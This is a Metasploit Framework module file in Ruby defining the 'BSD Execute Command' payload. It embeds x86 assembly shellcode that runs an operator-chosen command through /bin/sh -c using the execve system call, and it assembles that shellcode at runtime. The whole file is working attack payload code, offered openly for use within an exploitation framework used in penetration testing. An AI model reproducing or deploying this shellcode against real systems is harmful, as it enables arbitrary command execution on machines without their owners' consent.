metasploit-framework/modules/payloads/singles/bsd/x86/exec.rb

102 lines
1.8 KiB
Ruby

##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
###
#
# Exec
# ----
#
# Executes an arbitrary command.
#
###
module Metasploit3
include Msf::Payload::Single
include Msf::Payload::Bsd
def initialize(info = {})
super(merge_info(info,
'Name' => 'BSD Execute Command',
'Version' => '$Revision$',
'Description' => 'Execute an arbitrary command',
'Author' => 'vlad902',
'License' => MSF_LICENSE,
'Platform' => 'bsd',
'Arch' => ARCH_X86))
# Register exec options
register_options(
[
OptString.new('CMD', [ true, "The command string to execute" ]),
], self.class)
end
#
# Dynamically builds the exec payload based on the user's options.
#
def generate_stage
cmd = datastore['CMD'] || ''
asm = <<-EOS
;;
;
; Name: single_exec
; Platforms: *BSD
; Authors: vlad902 <vlad902 [at] gmail.com>
; Version: $Revision$
; License:
;
; This file is part of the Metasploit Exploit Framework
; and is subject to the same licenses and copyrights as
; the rest of this package.
;
; Description:
;
; Execute an arbitary command.
;
;;
; NULLs are fair game.
push 0x3b
pop eax
cdq
push edx
push 0x632d
mov edi, esp
push edx
push 0x68732f6e
push 0x69622f2f
mov ebx, esp
push edx
call getstr
db "CMD", 0x00
getstr:
push edi
push ebx
mov ecx, esp
push edx
push ecx
push ebx
push eax
int 0x80
EOS
asm.gsub!(/CMD/, cmd.gsub('"', "\\\""))
payload = Metasm::Shellcode.assemble(Metasm::Ia32.new, asm).encode_string
end
end